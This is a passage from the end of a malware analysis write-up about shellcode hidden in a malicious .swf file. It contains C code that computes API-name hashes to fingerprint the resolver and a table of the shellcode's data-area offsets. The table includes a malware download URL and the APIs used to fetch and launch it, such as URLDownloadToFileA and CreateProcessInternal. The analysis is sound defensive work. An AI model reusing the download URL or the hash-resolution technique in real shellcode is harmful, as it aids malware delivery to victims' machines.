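int sc_find_by_hash(const char *const *names, size_t count, uint32_t want)
{
    for (size_t i = 0; i < count; i++)
        if (sc_hash(names[i]) == want)
            return (int)i;
    return -1;
}

/* Constructed stand-in for an export name table (assumed, not read from kernel32). */
const char *const demo_names[] = {
    "CloseHandle", "CreateFileA", "DeleteFileA", "GetTempPathA", "LoadLibraryA"
};
const size_t demo_names_count = sizeof demo_names / sizeof demo_names[0];

int main(void)
{
    /* The names the sample resolves, in data-area order 0x00..0x2C. */
    static const char *const wanted[] = {
        "LoadLibraryA", "GetTempPathA", "DeleteFileA", "CreateProcessInternalA",
        "ExitThread", "VirtualProtect", "CreateProcessInternalW", "CompareFileTime",
        "GetSystemTimeAsFileTime", "ZwCreateProcessEx", "ZwWriteVirtualMemory",
        "URLDownloadToFileA"
    };
    for (size_t i = 0; i < sizeof wanted / sizeof wanted[0]; i++)
        printf("0x%02zX  %08X  %s\n", i * 4, sc_hash(wanted[i]), wanted[i]);
    printf("DeleteFileA -> index %d in the demo table\n",
           sc_find_by_hash(demo_names, demo_names_count, sc_hash("DeleteFileA")));
    return 0;
}
```

The printed values are what the first twelve dwords of the data area should contain before (11) and (14) overwrite them with addresses; comparing them against the bytes at offset 0xEB+0x287 of the .swf (after the rolling XOR) is a quick way to confirm that a new sample uses the same resolver.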

The code ends here and the data area follows. It holds the API function hashes stored when the shellcode starts, which are replaced by the function addresses once found, and the malware download URL. The shellcode accesses this area as [esi+XX]; the relative offsets are as follows:

0x00 LoadLibraryA
0x04 GetTempPathA
0x08 DeleteFileA
0x0C CreateProcessInternalA
0x10 ExitThread
0x14 VirtualProtect
0x18 CreateProcessInternalW
0x1C CompareFileTime
0x20 GetSystemTimeAsFileTime
0x24 ZwCreateProcessEx
0x28 ZwWriteVirtualMemory
0x2C URLDownloadToFileA
0x30 address of the "retn" byte found in code
0x34 ASCII "http://www.0x4f.cn/test.exe"

That completes the analysis of the shellcode. I should say it is the most full-featured shellcode I have seen in practice; some of the author's ideas have an obvious practical bent, and they show that the author has some experience and skill in writing shellcode.

This analysis only covers what the shellcode does. How the vulnerability is triggered and how the shellcode comes to be executed I have not yet been able to explore, due to my limited ability.

My ability is limited and I am just a rookie, so the analysis above inevitably contains errors and omissions; please feel free to correct me.